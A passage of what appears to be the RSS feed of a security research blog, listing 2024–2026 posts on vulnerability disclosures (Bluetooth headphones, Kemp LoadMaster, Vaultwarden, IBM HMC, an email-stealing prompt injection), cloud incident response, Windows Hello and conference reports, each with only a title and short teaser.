      <guid>https://insinuator.net/2026/01/incident-response-in-gcp-out-of-scope-out-of-mind/</guid>
      <description>&lt;p&gt;We are regularly offering a&#xA;&lt;a href=&#34;https://hm-ts.de/seminare/courses/google-cloud-gcp-incident-response-analysis-2&#34;&gt;GCP Incident Response and Analysis&lt;/a&gt;&#xA;training. In this training, we analyze resources in GCP cloud together with our&#xA;trainees that were successfully compromised by attackers, e.g., GCE instances&#xA;and Cloud Build projects. Therefore, we need tooling that quickly detects&#xA;misconfiguration of resources that helped the attacker during the compromise.&#xA;During the analysis of different tools and different kinds of misconfiguration&#xA;we realized that GCE instance &lt;em&gt;access scopes&lt;/em&gt; are a blind spot of many (in fact&#xA;all that we tested) security audit tools. In this blog post, we want to&#xA;elaborate on the problems that arise from this behavior.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Bluetooth Headphone Jacking: Full Disclosure of Airoha RACE Vulnerabilities</title>
      <link>https://insinuator.net/2025/12/bluetooth-headphone-jacking-full-disclosure-of-airoha-race-vulnerabilities/</link>
      <pubDate>Sun, 28 Dec 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/12/bluetooth-headphone-jacking-full-disclosure-of-airoha-race-vulnerabilities/</guid>
      <description>&lt;p&gt;About six months ago we released a&#xA;&lt;a href=&#34;https://insinuator.net/2025/06/airoha-bluetooth-security-vulnerabilities/&#34;&gt;security advisory&lt;/a&gt;&#xA;on this blog about vulnerabilities in Airoha-based Bluetooth headphones and&#xA;earbuds. Back then, we didn’t release all technical details to give vendors more&#xA;time to release updates and users time to patch their devices. Around the time&#xA;of the initial partial disclosure in the beginning of June, Airoha put out an&#xA;SDK release for their customers that mitigates the vulnerabilities. Now, half a&#xA;year later, we finally want to publish the technical details and release a tool&#xA;for researchers and users to continue researching and check whether their&#xA;devices are vulnerable.&lt;/p&gt;</description>
    </item>
    <item>
      <title>MCTTP 2025 / Keynote</title>
      <link>https://insinuator.net/2025/10/mcttp-2025-/-keynote/</link>
      <pubDate>Mon, 20 Oct 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/10/mcttp-2025-/-keynote/</guid>
      <description>&lt;p&gt;Three weeks ago, I attended &lt;a href=&#34;https://www.mcttp.de&#34;&gt;MCTTP 2025&lt;/a&gt; in Munich,&#xA;organized by Vogel IT and curated by the fine folks Florian Hansemann, Dr. Marc&#xA;Maisch, and Florian Oelmaier. Awesome event with some very cool talks, and great&#xA;conversations over dinner and most notably at the Oktoberfest on Saturday&#xA;(thanks again for that special trip, Flo!). I had the pleasure and honor to give&#xA;the keynote on the 2nd day. The goal was to make it a bit entertaining and&#xA;enlightening for the international audience, so I covered some German&#xA;literature, too ;-). The slides can be found&#xA;&lt;a href=&#34;https://ernw.de/download/Enno_ERNW_MCTTP_keynote.pdf&#34;&gt;here&lt;/a&gt;, and the transcript&#xA;&lt;a href=&#34;https://ernw.de/download/ERNW_Enno_MCTTP_2025_Faust.pdf&#34;&gt;here&lt;/a&gt;. Looking forward&#xA;to meeting some folks again next year, maybe even at&#xA;&lt;a href=&#34;https://troopers.de&#34;&gt;TROOPERS26&lt;/a&gt; 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>Release of ERNW White Paper 73: Analyzing WinpMem Driver Vulnerabilities</title>
      <link>https://insinuator.net/2025/10/release-of-ernw-white-paper-73-analyzing-winpmem-driver-vulnerabilities/</link>
      <pubDate>Thu, 02 Oct 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/10/release-of-ernw-white-paper-73-analyzing-winpmem-driver-vulnerabilities/</guid>
      <description>&lt;p&gt;Today we are releasing a new white paper that delivers a technical analysis of&#xA;security weaknesses discovered in WinpMem, an open-source Windows memory&#xA;acquisition driver widely used in digital forensics.&lt;/p&gt;&#xA;&lt;p&gt;After a concise primer on relevant Windows internals (virtual vs. physical&#xA;memory, page tables and PTEs, CR3 context switching, and kernel and user memory&#xA;separation), the report examines how both the fundamental design of WinpMem and&#xA;specific implementation choices create severe risk.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Disclosure: Authentication Bypass in VERTIV Avocent AutoView (Version 2.10.0.0.4736)</title>
      <link>https://insinuator.net/2025/09/disclosure-authentication-bypass-in-vertiv-avocent-autoview-version-2.10.0.0.4736/</link>
      <pubDate>Mon, 08 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/09/disclosure-authentication-bypass-in-vertiv-avocent-autoview-version-2.10.0.0.4736/</guid>
      <description>&lt;p&gt;The VERTIV Avocent AutoView switches are analog keyboard, video, and mouse (KVM)&#xA;switches used in data center servers. They also expose a web server in the&#xA;network, which allows for some configuration.&lt;/p&gt;&#xA;&lt;p&gt;During a penetration test for a customer, a device of this type was identified&#xA;in the infrastructure and analyzed, revealing an authentication bypass in the&#xA;web application.&lt;/p&gt;&#xA;&lt;p&gt;The application is written in PHP. To gain access to the PHP scripts, the&#xA;firmware update was downloaded from the vendor’s download page. From the update,&#xA;the PHP files can easily be extracted and analyzed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerability Disclosure: Stealing Emails via Prompt Injections</title>
      <link>https://insinuator.net/2025/09/vulnerability-disclosure-stealing-emails-via-prompt-injections/</link>
      <pubDate>Tue, 02 Sep 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/09/vulnerability-disclosure-stealing-emails-via-prompt-injections/</guid>
      <description>&lt;p&gt;With the rise of AI assistance features in an increasing number of products, we&#xA;have begun to focus some of our research efforts on refining our internal&#xA;detection and testing guidelines for LLMs by taking a brief look at the new AI&#xA;integrations we discover.&lt;/p&gt;&#xA;&lt;p&gt;Alongside the rise of applications with LLM integrations, an increasing number&#xA;of customers come to ERNW to specifically assess AI applications. Our colleagues&#xA;&lt;a href=&#34;https://www.linkedin.com/in/fgrunow&#34;&gt;Florian Grunow&lt;/a&gt; and&#xA;&lt;a href=&#34;https://www.linkedin.com/in/hannesmohr/&#34;&gt;Hannes Mohr&lt;/a&gt; analyzed the novel attack&#xA;vectors that emerged and presented the results at&#xA;&lt;a href=&#34;https://troopers.de/troopers24/talks/vnwhm8/&#34;&gt;TROOPERS24&lt;/a&gt; already.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Hello for Business - Faceplant: Planting Biometric Templates</title>
      <link>https://insinuator.net/2025/08/windows-hello-for-business-faceplant-planting-biometric-templates/</link>
      <pubDate>Fri, 29 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/08/windows-hello-for-business-faceplant-planting-biometric-templates/</guid>
      <description>&lt;p&gt;We are back from Black Hat USA, where we presented our research on&#xA;&lt;a href=&#34;https://www.blackhat.com/us-25/briefings/schedule/index.html#windows-hell-no-for-business-45865&#34;&gt;Windows Hello for Business&lt;/a&gt;&#xA;(&lt;a href=&#34;http://i.blackhat.com/BH-USA-25/Presentations/US-25-David-Windows-Hello-No-for-Business-Wendsday.pdf&#34;&gt;Slides&lt;/a&gt;)&#xA;once more. In the last two blog posts, we have discussed the&#xA;&lt;a href=&#34;https://insinuator.net/2025/06/windows-hello-for-business-past-and-present-attacks/&#34;&gt;architecture of WHfB and past attacks&lt;/a&gt;,&#xA;as well as how the&#xA;&lt;a href=&#34;https://insinuator.net/2025/07/windows-hello-for-business-the-face-swap/&#34;&gt;database works and how to swap identities&lt;/a&gt; in&#xA;the database.&lt;/p&gt;&#xA;&lt;p&gt;First, a few words regarding my experience at Black Hat: for me, it was the&#xA;first time attending the conference and then directly as a speaker. I thoroughly&#xA;enjoyed Black Hat. It took a while to get used to the size of the conference and&#xA;the vibe of Las Vegas. What was especially interesting for me was connecting&#xA;with other researchers. One thing that stood out was meeting with the team from&#xA;MSRC and putting faces to the team itself. It feels way more personal to know&#xA;who you’re talking to when you know the people handling your cases. During&#xA;TROOPERS I typically have the chance to connect with many researchers, mainly&#xA;from Europe. At Black Hat US, on the other hand, it is possible to connect more&#xA;with the US scene and meet people you haven’t seen in a long time! Seeing&#xA;familiar faces again is always nice, as opposed to putting them into your&#xA;biometric template database. One nice detail was that some international&#xA;researchers are aware of the research BSI (German: “Bundesamt für Sicherheit in&#xA;der Informationstechnik” – “German federal office for IT security”) is&#xA;facilitating. The results of our presentation stem from the “Windows Dissected”&#xA;project we are performing on behalf of the BSI.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TROOPERS25 AD &amp; Entra ID Security Track</title>
      <link>https://insinuator.net/2025/08/troopers25-ad-entra-id-security-track/</link>
      <pubDate>Thu, 14 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/08/troopers25-ad-entra-id-security-track/</guid>
      <description>&lt;p&gt;The #TROOPERS25 ‘AD &amp;amp; Entra ID Security’ track was a blast – as was the whole&#xA;conference 😉 –  bringing together some of the smartest researchers in the field&#xA;and a great audience of practitioners willing to share their experiences during&#xA;the &lt;a href=&#34;https://troopers.de/roundtables/&#34;&gt;roundtable&lt;/a&gt;. The slides of the talks have&#xA;been released in the interim on the &lt;a href=&#34;https://troopers.de&#34;&gt;TROOPERS website&lt;/a&gt;, but&#xA;since many speakers published additional blogposts or released tools, we provide&#xA;a compilation of resources from the track in the following.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Setting up Secure Boot on Gentoo Linux</title>
      <link>https://insinuator.net/2025/07/setting-up-secure-boot-on-gentoo-linux/</link>
      <pubDate>Mon, 28 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/07/setting-up-secure-boot-on-gentoo-linux/</guid>
      <description>&lt;p&gt;The purpose of this blog post is to explain how Secure Boot works. In&#xA;particular, we will explain where current implementations of Secure Boot by&#xA;Linux distributors fall short compared to Microsoft Windows and Apple macOS.&lt;/p&gt;&#xA;&lt;p&gt;Major distributors like Canonical, Debian, openSUSE, and Red Hat place a high&#xA;priority on making their operating systems work out of the box. Given the&#xA;current Linux landscape with out-of-tree drivers and incompatible licenses,&#xA;providing the end user with all the drivers possibly needed to boot the system&#xA;can be challenging.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Hello for Business - The Face Swap</title>
      <link>https://insinuator.net/2025/07/windows-hello-for-business-the-face-swap/</link>
      <pubDate>Tue, 15 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/07/windows-hello-for-business-the-face-swap/</guid>
      <description>&lt;p&gt;In the&#xA;&lt;a href=&#34;https://insinuator.net/2025/06/windows-hello-for-business-past-and-present-attacks/&#34;&gt;last blog post&lt;/a&gt;,&#xA;we discussed the full authentication flow using Windows Hello for Business&#xA;(WHfB) with face recognition to authenticate against an Active Directory with&#xA;Kerberos and showcased existing and new vulnerabilities. In this blog post, we&#xA;dive into the architectural challenges WHfB faces and explore how we can exploit&#xA;them.&lt;/p&gt;&#xA;&lt;p&gt;The majority of the work was conducted in the context of the “Windows Dissected”&#xA;project. This project, funded by the BSI (German: “Bundesamt für Sicherheit in&#xA;der Informationstechnik” – the German Federal Office for Information Security),&#xA;has the goal to perform ” various in-depth security analyses of&#xA;security-critical components and functions in Windows.” Over the next years we&#xA;will discuss these results here once they are published.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Insecure Boot: Injecting initramfs from a debug shell</title>
      <link>https://insinuator.net/2025/07/insecure-boot-injecting-initramfs-from-a-debug-shell/</link>
      <pubDate>Thu, 03 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/07/insecure-boot-injecting-initramfs-from-a-debug-shell/</guid>
      <description>&lt;p&gt;Many Linux hardening guides focus on well-known protections: full-disk&#xA;encryption, Secure Boot, and password-protected bootloaders. While these&#xA;measures are critical, they often overlook a subtle but serious attack vector:&#xA;the ability to drop into a debug shell via the &lt;em&gt;Initial RAM Filesystem&lt;/em&gt;&#xA;(initramfs). This oversight can enable an attacker with brief physical access to&#xA;bypass conventional boot protections and inject persistent malware into the&#xA;system.&lt;/p&gt;&#xA;&lt;p&gt;In this post, it is demonstrated how this attack works on modern Linux&#xA;distributions, such as Ubuntu and Fedora, and explained why existing guidance&#xA;often fails to mention it.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Advisory: Airoha-based Bluetooth Headphones and Earbuds</title>
      <link>https://insinuator.net/2025/06/security-advisory-airoha-based-bluetooth-headphones-and-earbuds/</link>
      <pubDate>Thu, 26 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/06/security-advisory-airoha-based-bluetooth-headphones-and-earbuds/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Important note:&lt;/strong&gt; Some media coverage on this topic falsely or inaccurately&#xA;depicts the attack conditions. To be clear: Any vulnerable device can be&#xA;compromised if the attacker is in Bluetooth range. That is the only&#xA;precondition.&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;During our research on Bluetooth headphones and earbuds, we identified several&#xA;vulnerabilities in devices that incorporate Airoha Systems on a Chip (SoCs). In&#xA;this blog post, we briefly want to describe the vulnerabilities, point out their&#xA;impact and provide some context to currently running patch delivery processes as&#xA;described at this year’s&#xA;&lt;a href=&#34;https://troopers.de/troopers25/talks/fbnb8y/&#34;&gt;TROOPERS Conference&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Hello for Business – Past and Present Attacks</title>
      <link>https://insinuator.net/2025/06/windows-hello-for-business-past-and-present-attacks/</link>
      <pubDate>Fri, 20 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/06/windows-hello-for-business-past-and-present-attacks/</guid>
      <description>&lt;p&gt;Windows Hello for Business is a key component of Microsoft’s passwordless&#xA;authentication strategy. It enables user authentication not only during system&#xA;sign-in but also in conjunction with new and advanced features such as Personal&#xA;Data Encryption, Administrator Protection, and Recall. Rather than depending on&#xA;traditional passwords, Windows Hello leverages a PIN or biometric methods – such&#xA;as fingerprint or facial recognition – to unlock cryptographic keys protected by&#xA;the Trusted Platform Module (TPM).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Disclosure: Multiple Vulnerabilities in X.Org X server prior to 21.1.17 and Xwayland prior to 24.1.7</title>
      <link>https://insinuator.net/2025/06/disclosure-multiple-vulnerabilities-in-x.org-x-server-prior-to-21.1.17-and-xwayland-prior-to-24.1.7/</link>
      <pubDate>Tue, 17 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/06/disclosure-multiple-vulnerabilities-in-x.org-x-server-prior-to-21.1.17-and-xwayland-prior-to-24.1.7/</guid>
      <description>&lt;p&gt;The X11 Window System has been used since September 1987 for Unix desktop&#xA;systems, allowing applications to display their windows. Today, one of the&#xA;server implementations of the protocol is the X.Org X server and XWayland, which&#xA;both use the same codebase. While reviewing the X server, several legacy&#xA;security issues were identified. These appear to originate from earlier design&#xA;stages when security considerations were less prominent. Despite the project’s&#xA;maturity and widespread use, some of these issues have persisted.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Using the Raspberry Pi Pico W as a Bluetooth Dongle</title>
      <link>https://insinuator.net/2025/06/using-the-raspberry-pi-pico-w-as-a-bluetooth-dongle/</link>
      <pubDate>Fri, 13 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/06/using-the-raspberry-pi-pico-w-as-a-bluetooth-dongle/</guid>
      <description>&lt;p&gt;During our recent research, we experimented with different Bluetooth USB&#xA;dongles. There are tons of options, and sometimes, it’s challenging to determine&#xA;what chipset a dongle actually contains, what Bluetooth features it supports,&#xA;and whether it works on Linux. Inspired by the recent&#xA;&lt;a href=&#34;https://www.tarlogic.com/blog/esp32-hidden-hci-vendor-commands/&#34;&gt;ESP32 Bluetooth research&lt;/a&gt;,&#xA;we wondered whether we could turn our Raspberry Pi Pico Ws into a functioning&#xA;Bluetooth dongle. We had a few lying around, and the advantage here is that we&#xA;know exactly which&#xA;&lt;a href=&#34;https://www.raspberrypi.com/documentation/microcontrollers/pico-series.html&#34;&gt;Bluetooth controller it uses&lt;/a&gt;&#xA;– the Infineon CYW43439. It’s also very easy to get one. You can just buy the&#xA;Pico W for a few bucks, even cheaper than some Bluetooth dongles. You also have&#xA;a controller family that has been researched quite a bit in the&#xA;&lt;a href=&#34;https://github.com/seemoo-lab/internalblue/&#34;&gt;internalblue project&lt;/a&gt;. However,&#xA;there was one disadvantage. We did not find any code that exposes the CYW43439’s&#xA;HCI interface via USB. So we had to write that on our own.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Disclosure: Input Validation Vulnerabilities in Microsoft Bookings</title>
      <link>https://insinuator.net/2025/05/disclosure-input-validation-vulnerabilities-in-microsoft-bookings/</link>
      <pubDate>Thu, 08 May 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/05/disclosure-input-validation-vulnerabilities-in-microsoft-bookings/</guid>
      <description>&lt;p&gt;In a recent customer project, we discovered vulnerabilities in Microsoft&#xA;Bookings, an online appointment scheduling tool integrated into Microsoft 365,&#xA;allowing companies to have customers book meetings in available times&#xA;themselves. The findings originate from insufficient input validation on the&#xA;public meeting scheduling endpoint. Although Microsoft has largely mitigated&#xA;this vulnerability, our analysis provides important insights into potential&#xA;risks and areas for improvement.&lt;/p&gt;&#xA;&lt;h2 id=&#34;introduction--context&#34;&gt;Introduction &amp;amp; Context&lt;/h2&gt;&#xA;&lt;p&gt;Microsoft Bookings is a service that allows organizations to manage appointments&#xA;and meetings via a web interface. With integration to services such as Microsoft&#xA;Teams, the security of the booking process is critical. This blog post outlines&#xA;our technical analysis of the vulnerability, including proof-of-concept details&#xA;and an overview of the vendor response.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Full Disclosure: Multiple Rundeck Job Command Injections</title>
      <link>https://insinuator.net/2025/05/full-disclosure-multiple-rundeck-job-command-injections/</link>
      <pubDate>Mon, 05 May 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/05/full-disclosure-multiple-rundeck-job-command-injections/</guid>
      <description>&lt;p&gt;During a red-teaming-style customer project, we managed to get access to an&#xA;&lt;a href=&#34;https://www.rundeck.com/&#34;&gt;Rundeck&lt;/a&gt; API token. Rundeck is a job scheduler and&#xA;runbook automation platform designed to automate routine IT tasks across&#xA;multiple systems. At first, we were excited about this API token because if we&#xA;could create new Rundeck jobs, we could execute arbitrary code on the Rundeck&#xA;nodes and move laterally from there. However, it turned out that with this token&#xA;we only had permissions to run existing jobs.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerability Disclosure: Restricted Shell Breakout (CVE-2025-1950) and Privilege Escalation (CVE-2025-1951) in IBM Power Hardware Management Console (HMC)</title>
      <link>https://insinuator.net/2025/04/vulnerability-disclosure-restricted-shell-breakout-cve-2025-1950-and-privilege-escalation-cve-2025-1951-in-ibm-power-hardware-management-console-hmc/</link>
      <pubDate>Fri, 25 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/04/vulnerability-disclosure-restricted-shell-breakout-cve-2025-1950-and-privilege-escalation-cve-2025-1951-in-ibm-power-hardware-management-console-hmc/</guid>
      <description>&lt;p&gt;We discovered a private key for accessing an IBM Hardware Management Console&#xA;(HMC) during a recent red team engagement. The IBM Hardware Management Console&#xA;(HMC) is a dedicated management system used to control and manage IBM servers,&#xA;especially those running on Power Systems (like IBM Power9/Power10) and&#xA;mainframes (z Systems). After brief research, we identified two security&#xA;vulnerabilities that can be leveraged to gain root access to the HMC.&lt;/p&gt;&#xA;&lt;p&gt;Access for most users via SSH is limited through the &lt;code&gt;hmcbash&lt;/code&gt;, a restricted&#xA;shell environment. Using &lt;code&gt;LD_PRELOAD&lt;/code&gt;, attackers can break out of the restricted&#xA;bash and gain access to additional binaries installed on the system. With the&#xA;restrictions lifted, attackers can use a &lt;code&gt;setuid&lt;/code&gt; binary, &lt;code&gt;copysshkey&lt;/code&gt;, to&#xA;elevate privileges to &lt;code&gt;root&lt;/code&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Cookie Prefixes – The Lesser Known Cookie Security Feature</title>
      <link>https://insinuator.net/2025/04/cookie-prefixes-the-lesser-known-cookie-security-feature/</link>
      <pubDate>Tue, 08 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/04/cookie-prefixes-the-lesser-known-cookie-security-feature/</guid>
      <description>&lt;p&gt;When you’re analyzing web applications as a pentester or reading pentest reports&#xA;about web applications, you will often see findings regarding cookies missing&#xA;certain security flags. The &lt;em&gt;Set-Cookie&lt;/em&gt; HTTP header and the JavaScript&#xA;&lt;em&gt;document.cookie&lt;/em&gt; API allow to use, for example, the&#xA;flags &lt;em&gt;&lt;a href=&#34;https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Set-Cookie#secure&#34;&gt;Secure&lt;/a&gt;&lt;/em&gt;, &lt;em&gt;&lt;a href=&#34;https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Set-Cookie#pathpath-value&#34;&gt;Path&lt;/a&gt;&lt;/em&gt;, and &lt;em&gt;&lt;a href=&#34;https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Set-Cookie#domaindomain-value&#34;&gt;Domain&lt;/a&gt;&lt;/em&gt;.&#xA;Common audit and pentest tools will tell you when your web application does not&#xA;or just insecurely implements these cookie flags.&lt;/p&gt;&#xA;&lt;p&gt;However, they do not provide optimal security even when using these flags&#xA;correctly. However, there are mitigations available that partly solve the&#xA;issues.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CVE-2024-11035: Minor Security Issues in VMware Carbon Black Cloud</title>
      <link>https://insinuator.net/2025/03/cve-2024-11035-minor-security-issues-in-vmware-carbon-black-cloud/</link>
      <pubDate>Mon, 31 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/03/cve-2024-11035-minor-security-issues-in-vmware-carbon-black-cloud/</guid>
      <description>&lt;p&gt;We recently conducted a security assessment of VMware Carbon Black Cloud, a&#xA;unified SaaS solution that integrates endpoint detection and response (EDR),&#xA;anti-virus, and vulnerability management capabilities. As part of our&#xA;evaluation, we tested the solution’s ability to detect and prevent malicious&#xA;activity on Windows and Linux systems. Our analysis focused on the Carbon Black&#xA;agents for these platforms, and although we did not identify any critical&#xA;vulnerabilities, we want to share some of the findings in this blog post.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CVE-2025-20908: Use of insufficiently random values in Samsung&#39;s Auracast implementation</title>
      <link>https://insinuator.net/2025/03/cve-2025-20908-use-of-insufficiently-random-values-in-samsungs-auracast-implementation/</link>
      <pubDate>Thu, 13 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/03/cve-2025-20908-use-of-insufficiently-random-values-in-samsungs-auracast-implementation/</guid>
      <description>&lt;p&gt;As part of our &lt;a href=&#34;https://insinuator.net/2025/01/auracast-part1/&#34;&gt;research&lt;/a&gt; into&#xA;the Auracast feature set in Bluetooth, we also started looking into vendor&#xA;implementations. At the time we started with our research, there weren’t a lot&#xA;of products on the market yet. But new products are coming out pretty frequently&#xA;now.&lt;/p&gt;&#xA;&lt;p&gt;One of the vendors that had Auracast implemented pretty early was Samsung. At&#xA;the time the Samsung Galaxy S23 and S24 phones were able to broadcast Audio,&#xA;while the Galaxy Buds were able to join these broadcasts.&lt;/p&gt;</description>
    </item>
    <item>
      <title>When Your Edge Browser Syncs Private Data to Your Employer</title>
      <link>https://insinuator.net/2025/02/when-your-edge-browser-syncs-private-data-to-your-employer/</link>
      <pubDate>Fri, 07 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/02/when-your-edge-browser-syncs-private-data-to-your-employer/</guid>
      <description>&lt;p&gt;Recently, one of our customers contacted us to investigate the extent of some&#xA;unwanted and unexpected behavior regarding browsing data of employees.&lt;/p&gt;&#xA;&lt;p&gt;Employees started contacting IT support because private browser bookmarks,&#xA;private login credentials etc. showed up on their work machines. All affected&#xA;employees stated that they never created these bookmarks on work systems. And&#xA;interestingly, the data seemed to have been collected over quite some time.&lt;/p&gt;&#xA;&lt;p&gt;Our customer wanted to understand how private data ended up in their&#xA;environment. Obviously, private employee data in the enterprise landscape could&#xA;cause some data privacy trouble (GDPR).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Jigsaw RDPuzzle: Piecing Attacker Actions Together</title>
      <link>https://insinuator.net/2025/01/jigsaw-rdpuzzle-piecing-attacker-actions-together/</link>
      <pubDate>Wed, 29 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/01/jigsaw-rdpuzzle-piecing-attacker-actions-together/</guid>
      <description>&lt;p&gt;In a recent incident response project, we had the chance to virtually look over&#xA;the attackers’ shoulder and observe their activities. The attackers used the&#xA;Remote Desktop Protocol (RDP) for lateral movement within the compromized&#xA;environment and beyond (MITRE techniques&#xA;&lt;a href=&#34;https://attack.mitre.org/techniques/T1570/&#34;&gt;T1570&lt;/a&gt;,&#xA;&lt;a href=&#34;https://attack.mitre.org/techniques/T1021/001/&#34;&gt;T1021&lt;/a&gt;). As a matter of fact,&#xA;RDP creates cache files that contain tiles of the transferred screen recording&#xA;data. While this fact is well-known and there are existing tools, we found it&#xA;worth reporting because of two different aspects:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Part I: Bluetooth Auracast from a Security Researcher’s Perspective</title>
      <link>https://insinuator.net/2025/01/part-i-bluetooth-auracast-from-a-security-researchers-perspective/</link>
      <pubDate>Mon, 27 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2025/01/part-i-bluetooth-auracast-from-a-security-researchers-perspective/</guid>
      <description>&lt;p&gt;Auracast, the new Bluetooth LE Broadcast Audio feature has gained some publicity&#xA;in the past months. The Bluetooth SIG has introduced the LE Audio feature-set to&#xA;the Bluetooth 5.2 Specification in 2019 and vendors are only now starting to&#xA;implement it. Auracast facilitates broadcasting audio over Bluetooth LE to a&#xA;potentially unlimited number of devices. It does not require pairing or&#xA;interaction between the sender and the receivers.&lt;/p&gt;&#xA;&lt;p&gt;We also presented this topic&#xA;&lt;a href=&#34;https://media.ccc.de/v/38c3-auracast-breaking-broadcast-le-audio-before-it-hits-the-shelves&#34;&gt;at 38c3&lt;/a&gt;.&#xA;This blog post will contain similar contents albeit with some more details.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerability Disclosure: Command Injection in Kemp LoadMaster Load Balancer (CVE-2024-7591)</title>
      <link>https://insinuator.net/2024/11/vulnerability-disclosure-command-injection-in-kemp-loadmaster-load-balancer-cve-2024-7591/</link>
      <pubDate>Wed, 27 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/11/vulnerability-disclosure-command-injection-in-kemp-loadmaster-load-balancer-cve-2024-7591/</guid>
      <description>&lt;p&gt;While conducting security research, I identified a critical vulnerability in Kemp’s LoadMaster Load Balancer. This vulnerability is a &lt;a href=&#34;https://owasp.org/www-community/attacks/Command_Injection&#34;&gt;Command Injection&lt;/a&gt; and allows full system compromise. It requires no authentication and can be exploited remotely by having access to the Web User Interface (WUI). Kemp found that all LoadMaster versions up to and including version 7.2.60.0 and also the multi-tenant hypervisors up to and including version 7.1.35.11 are affected.&lt;/p&gt;&#xA;&lt;p&gt;Kemp LoadMaster is a widely used Load Balancing Application that can commonly be seen in customer engagements. Therefore, we decided to take a closer look as part of our regular research projects.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerability Disclosure: Authentication Bypass in Vaultwarden versions &lt; 1.32.5 - CVE-2024-55225</title>
      <link>https://insinuator.net/2024/11/vulnerability-disclosure-authentication-bypass-in-vaultwarden-versions-1.32.5-cve-2024-55225/</link>
      <pubDate>Fri, 22 Nov 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/11/vulnerability-disclosure-authentication-bypass-in-vaultwarden-versions-1.32.5-cve-2024-55225/</guid>
      <description>&lt;p&gt;During a penetration test for a customer, we briefly assessed &lt;a href=&#34;https://github.com/dani-garcia/vaultwarden&#34;&gt;Vaultwarden&lt;/a&gt;, an open-source online password safe. In June 2024, the German Federal Office for Information Security (BSI) published results&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt; of a static and dynamic test of the Vaultwarden server component. Therefore, only a partial source code audit was performed during our assessment. However, a quick look was needed to find some glaring issues with the authentication.&lt;/p&gt;&#xA;&lt;h2 id=&#34;vaultwarden&#34;&gt;Vaultwarden&lt;/h2&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://github.com/dani-garcia/vaultwarden&#34;&gt;Vaultwarden&lt;/a&gt; is an alternative online password safe server to Bitwarden and exposes the same API so that Bitwarden clients can connect to the Vaultwarden server. Since Bitwarden has a Browser client and Mobile clients, they can all connect to Vaultwarden, too.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Announcement: Progress / Kemp LoadMaster CVE-2024-7591</title>
      <link>https://insinuator.net/2024/09/announcement-progress-/-kemp-loadmaster-cve-2024-7591/</link>
      <pubDate>Mon, 09 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/09/announcement-progress-/-kemp-loadmaster-cve-2024-7591/</guid>
